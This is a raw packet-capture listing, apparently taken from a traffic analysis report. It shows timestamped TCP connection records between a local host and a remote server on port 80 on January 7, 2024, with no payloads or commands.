                                                                                                                                                                    Jan 7, 2024 05:29:29.637247086 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.637248993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637485981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637522936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.637706995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637816906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637943029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637994051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.637995958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.638021946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.638031960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.638405085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.638446093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.638545036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.638637066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.638679028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.638694048 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.638761044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.638858080 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.639043093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.639545918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.639591932 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.639662981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.639734983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.639784098 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.639816999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.639914036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.639955997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.640023947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640079975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640125990 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.640166998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640259981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640404940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.640439034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640505075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640547037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.640568018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640640974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640738010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.640738964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640821934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640851974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.640862942 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.641037941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641077042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.641108036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641170025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641215086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641218901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.641314983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641345978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641354084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.641432047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641485929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.641545057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641851902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.641892910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.641957045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642041922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642091036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.642170906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642314911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642359972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.642390013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642472029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642520905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.642549038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642590046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642623901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.642662048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642714977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642760038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.642801046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.642927885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.643002033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.643040895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.643089056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.643373966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.823645115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.823704004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.823842049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.824122906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.824158907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.824201107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.824600935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.824616909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.824656963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.824934006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.824974060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.825023890 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.825139999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.825159073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.825193882 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.825591087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.825642109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.825684071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.826246023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.826307058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.826359987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.826384068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.826385021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.826421976 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.826847076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.826886892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.826927900 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.827255964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.827313900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.827362061 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.827404022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.827435970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.827495098 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.828025103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828073978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828089952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828130960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.828159094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828180075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828195095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828219891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828226089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.828243971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828244925 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.828288078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.828447104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828470945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.828572035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.829067945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.829097033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.829334021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.829783916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.829843998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.829859972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.829896927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.829905987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.829942942 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.830146074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.830162048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.830208063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.830338955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.830364943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.830435991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.830626965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.830665112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831028938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.831074953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831089973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831134081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.831747055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831801891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831825972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831861973 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.831892014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831907988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831931114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.831945896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.831981897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.832475901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.832500935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.832536936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.832540989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.832578897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.832747936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.832897902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.832921028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.832954884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.833163023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.833194971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.833237886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.833245039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.833318949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.833370924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.834136009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.834151983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.834265947 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.834423065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.834470987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.834517956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.835180044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835225105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835478067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.835484028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835546970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835599899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835613966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.835649014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835699081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835710049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.835720062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835753918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835778952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.835814953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835850954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.835875034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835912943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835964918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.835980892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836021900 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.836047888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.836123943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836172104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836242914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.836272001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836287975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836380959 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.836436033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836527109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.836568117 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.837081909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837146997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837163925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837177992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837203979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.837224007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.837260008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837276936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837374926 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.837593079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837609053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837667942 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.837692976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837711096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837758064 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.837959051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.837981939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.838409901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.838417053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.838439941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.838471889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.838507891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.838517904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.838553905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:29.839042902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:29.903498888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.018583059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.018660069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.018712044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.018750906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.018826008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.018991947 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.019402027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.019485950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.019540071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.019587994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.019789934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.019831896 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.019855976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.019923925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.019999027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.020036936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.020354986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.020406008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.020519972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021155119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021217108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021255970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.021411896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021439075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021452904 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.021615028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021694899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.021748066 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.022450924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022511005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.022553921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022639990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022655964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022697926 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.022738934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022775888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.022814035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022866964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022928953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.022964954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.023025036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.023041010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.023072958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.023139000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.023180962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.023211002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.023276091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.023367882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.023406029 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.023983955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024065971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024111986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.024378061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024418116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.024450064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024521112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024667025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024703979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.024733067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.024771929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.024822950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.025315046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.025391102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.025434971 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:30.025451899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:30.025485992 CET804973591.215.85.120192.168.2.4
